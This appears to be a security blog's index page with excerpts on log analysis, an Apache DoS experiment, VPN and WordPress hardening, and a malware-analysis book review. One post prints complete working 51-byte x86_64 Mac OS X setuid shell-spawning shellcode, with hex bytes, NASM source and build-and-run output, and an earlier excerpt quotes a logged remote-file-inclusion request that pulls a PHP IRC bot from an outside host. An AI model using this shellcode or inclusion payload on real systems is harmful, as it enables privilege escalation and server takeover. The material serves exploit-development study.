Found a PHP IRC Bot in the Wild

Strange Requests

I was grepping through my access logs the other day and noticed several requests like the following

/include/mail.inc.php?skin_board_path=http://website/j1.txt

Strange Text File

I decided to take a look at what j1.txt was and discovered that it was a (nicely commented) PHP script that would join an IRC channel and accept commands. The script looks like it was originally coded in English and was later modified by some Indonesians.

I’m not sure exactly what vulnerability is being exploited here but it’s likely a local file inclusion type vulnerability where j1.txt (the PHP code) would end up on the server and could be executed by visiting a certain URL or embedded in the current page at the current URL.

(more…)

Apache Killer vs TheXploit.com

For those of you that haven’t heard (you must live under a rock), there is currently an unpatched DoS attack against all Apache Web servers that can easily be executed from a single computer. A Perl script was posted to the Full Disclosure mailing list last weekend.

I run Apache 2.2 on TheXploit.com so I thought it’d be an interesting experiment to see what happens. So, here we go: Apache Killer vs. TheXploit (more…)

Configure a Working SSL Subdomain on WordPress While Still Using CloudFlare

CloudFlare and Securing WordPress Admin

(more…)

VPNs: Setting up your own SSL VPN

“All I want for Christmas is my own VPN…my own VPN, my own VPN” – Dustin

I’ve been wanting to have access to my own secure VPN for quite some time so that when I’m away from home and only have access to insecure networks, I don’t have to use work’s VPN for personal use or worry about someone intercepting my traffic. I looked into a couple paid VPN solutions but none of them seem to guarantee your privacy as far as I’m concerned. I figured my best option was to setup and manage my own.
(more…)

Book Review: Malware Analyst’s Cookbook and DVD

As promised last week, here is my book review of the Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code by Michael Hale Ligh, Steven Adair, Blake Hartstein, and Matthew Richard.

About the Book

The book is a huge compilation of short how-to articles called recipes on the “tools and techniques for fighting malicious code.” In addition, the book comes with a number of very useful custom written tools for automating or speeding up the process. (more…)

Secure WordPress Admin Login Without HTTPS

I use WordPress as my blogging platform and unfortunately I’m on a shared host that charges a lot extra in order to serve HTTPS…even if it’s a self-signed certificate. My only use for HTTPS is logging in to the WordPress administrative console for management and new posts so it doesn’t really make sense to fork over that extra cash. Likewise, I tried the shared certificate provided by my host but that sent WordPress into a redirect loop for some reason.

If you’re in the same boat as me, there are a couple things you can do without spending any money. (more…)

Testing Your Unix-Based Shellcode on a Non-Executable Stack or Heap

I’ve been meaning to post about this technique I figured out while developing the OSX x86_64 setuid/shell shellcode [1] [2] I posted about last week but school and work have been pretty busy. It’s a simple technique that allows you to still test your shellcode on Unix-based OSes with non-executable stacks and heaps and can come in pretty handy for making sure your shellcode is right.

(more…)

Just Arrived: Malware Analyst’s Cookbook

Author Michael Ligh was very gracious to send me a review copy of his new book Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code. I took a quick browse through it when I opened it and it looks REALLY GOOD. If it’s anything like the articles on Michael’s website, I know I’m in for a damn good read!

I’m planning on starting it this Saturday due to some other priorities so heads up for a review post in the future or check it out for yourself

Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code (Paperback)

By (author): Michael Ligh, Steven Adair, Blake Hartstein, Matthew Richard


A computer forensics “how-to” for fighting malicious code and analyzing incidents

With our ever-increasing reliance on computers comes an ever-growing risk of malware. Security professionals will find plenty of solutions in this book to the problems posed by viruses, Trojan horses, worms, spyware, rootkits, adware, and other invasive software. Written by well-known malware experts, this guide reveals solutions to numerous problems and includes a DVD of custom programs and tools that illustrate the concepts, enhancing your skills.

  • Security professionals face a constant battle against malicious software; this practical manual will improve your analytical capabilities and provide dozens of valuable and innovative solutions
  • Covers classifying malware, packing and unpacking, dynamic malware analysis, decoding and decrypting, rootkit detection, memory forensics, open source malware research, and much more
  • Includes generous amounts of source code in C, Python, and Perl to extend your favorite tools or build new ones, and custom programs on the DVD to demonstrate the solutions

Malware Analyst’s Cookbook is indispensible to IT security administrators, incident responders, forensic analysts, and malware researchers.

 

51 Byte x86_64 OS X Null Free Shellcode

It doesn’t seem like there’s a lot of x86_64 bit shellcode out there for the Intel Mac platforms so I figured I’d write my own and share it. I’m using Mac OS X 10.6.5 at the time of this post.

Shellcode

Instead of starting with the source and ending with the shellcode, we’re going to throw this one in reverse and get right to the shellcode. So here you have it, a 51 byte Mac OS X 64 bit setuid/shell-spawning shellcode

/*
 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X / Intel x86_64
 *
 *  Created on: Nov 25, 2010
 *      Author: Dustin Schultz - TheXploit.com
 */
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";

Source

And now for the source in NASM/YASM syntax. If you’ve never done system calls on 64bit OS X and you’re confused, be sure to read my post on64 bit system calls in os x.

; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz - TheXploit.com
BITS 64

section .text
global start

start:
a:
 mov r8b, 0x02          ; Unix class system calls = 2 
 shl r8, 24             ; shift left 24 to the upper order bits
 or r8, 0x17            ; setuid = 23, or with class = 0x2000017
 xor edi, edi           ; zero out edi 
 mov rax, r8            ; syscall number in rax 
 syscall                ; invoke kernel
 jmp short c            ; jump to c
b:
 pop rdi                ; pop ret addr which = addr of /bin/sh
 add r8, 0x24           ; execve = 59, 0x24+r8=0x200003b
 mov rax, r8            ; syscall number in rax 
 xor rdx, rdx           ; zero out rdx 
 push rdx               ; null terminate rdi, pushed backwards
 push rdi               ; push rdi = pointer to /bin/sh
 mov rsi, rsp           ; pointer to null terminated /bin/sh string
 syscall                ; invoke the kernel
c:
 call b                 ; call b, push ret of /bin/sh
 db '/bin//sh'          ; /bin/sh string

I would never blindly use shellcode without testing it out my self (unless it’s from a trusted source like Metasploit)

nobody@nobody:~/$ nasm -f macho64 setuid_shell_x86_64.asm 
nobody@nobody:~/$ ld -arch x86_64 setuid_shell_x86_64.o
nobody@nobody:~/$ ./a.out 
sh-3.2$ 

And the final byte representation (verify against C source above)

nobody@nobody:~/$ otool -t setuid_shell_x86_64.o
setuid_shell_x86_64.o:
(__TEXT,__text) section
0000000000000000 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000000000010 0f 05 eb 12 5f 49 83 c0 24 4c 89 c0 48 31 d2 52 
0000000000000020 57 48 89 e6 0f 05 e8 e9 ff ff ff 2f 62 69 6e 2f 
0000000000000030 2f 73 68 

And that’s all. Be sure to checkback in the future or subscribe to my RSS feed. I definitely have more shellcode to come!

Phrack 67 Today!

Phrack 67 comes out today! Phrack is THE online magazine for anyone interested in security. Phrack was the original magazine to debut the infamous “Smashing The Stack For Fun And Profit” article. Its been some time since they last released an issue (2009). “Is your blood boiling?” – heck ya!

Be sure to check it out;you know it’s going to be good!

http://www.phrack.org/

Go to Top